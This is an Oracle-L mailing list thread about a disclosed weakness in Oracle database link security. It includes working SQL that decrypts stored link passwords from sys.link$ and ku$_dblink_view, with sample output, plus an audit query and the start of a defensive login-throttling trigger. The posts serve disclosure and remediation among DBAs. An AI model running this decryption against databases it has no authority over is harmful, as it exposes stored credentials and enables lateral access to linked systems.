I was unable to read the ku$ view as a DBA so if you have to be a sysdba user to read the view how much of a problem is this really? -----Original Message----- From: oracle-l-bounce@xxxxxxxxxxxxx [mailto:oracle-l-bounce@xxxxxxxxxxxxx] On Behalf Of oracle@xxxxxxxxxxxxx Sent: Wednesday, November 28, 2012 12:19 PM To: oracle-l@xxxxxxxxxxxxx Subject: Re: Database Link Security et al Hi **** Your question below is a good one, as I have had a number of other direct offline emails about the same topic since my original posting, which I will answer here in one go. The solution proposed of restricting access to sys.link$ is the well known remediation - but it does not solve this issue unfortunately, as you will see below the dblink ciphertexts are selectable through ku$_dblink_view as well, hence the wider visibility of the link passwords. SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) passwd from ku$_dblink_view; NAME -------------------------------------------------------------------------------- USERID ------------------------------ PASSWD -------------------------------------------------------------------------------- TEST_LINK.ENTERPRISE.INTERNAL.UK DBLINK_ACCOUNT mongo (11.2.0.1) I will be presenting additional new research, exclusive to UKOUG, on Monday. Cheers, Paul http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62 On 11/27/2012, "********" <*********@*****.com> wrote: >Hi Paul >Could you share the paper if that is ok. >I am interested in the automated solution for the db link security issue. >ONe thing is basically restrict access to link$. > >Thank you >**** > > > >On Sun, Nov 25, 2012 at 12:18 PM, <oracle@xxxxxxxxxxxxx> wrote: > >> >> So, users can decrypt dblink passwords as the key is included in the >> ciphertext... --> >> >> SQL> select name, userid, >> utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), >> 4353, (substr(passwordx,3,16)))) from sys.link$ where >> name='TEST_LINK'; >> >> NAME >> >> --------------------------------------------------------------------- >> ----------- >> USERID >> ------------------------------ >> PASSWORD >> >> --------------------------------------------------------------------- >> ----------- >> TEST_LINK >> DBLINK_ACCOUNT >> MYPW >> >> ..one saving grace is that we can now identify incoming db links >> using this.. >> >> select userid, terminal, comment$text from sys.aud$ where >> comment$text like 'DBLINK%'; >> USERID NTIMESTAMP# USERHOST COMMENT$TEXT >> ------------ ----------------- ------- -------------- >> DBLINK_ACCOUNT 19-NOV-12 01.42.16.305194000 orlin DBLINK_INFO: >> (SOURCE_GLOBAL_NAME=orcl.4294967295) >> >> -->could be too late though so best to take a few precautions in >> advance... preferably automated... >> >> ..Same with lack of profiles on SYS account. Sometimes easier to fix >> ourselves.. >> >> create or replace trigger sys_throttler.tra_servererror_ora1017 >> after servererror on database >> declare >> l_db_usr varchar2 (32); -- //www.freelists.org/webpage/oracle-l -- //www.freelists.org/webpage/oracle-l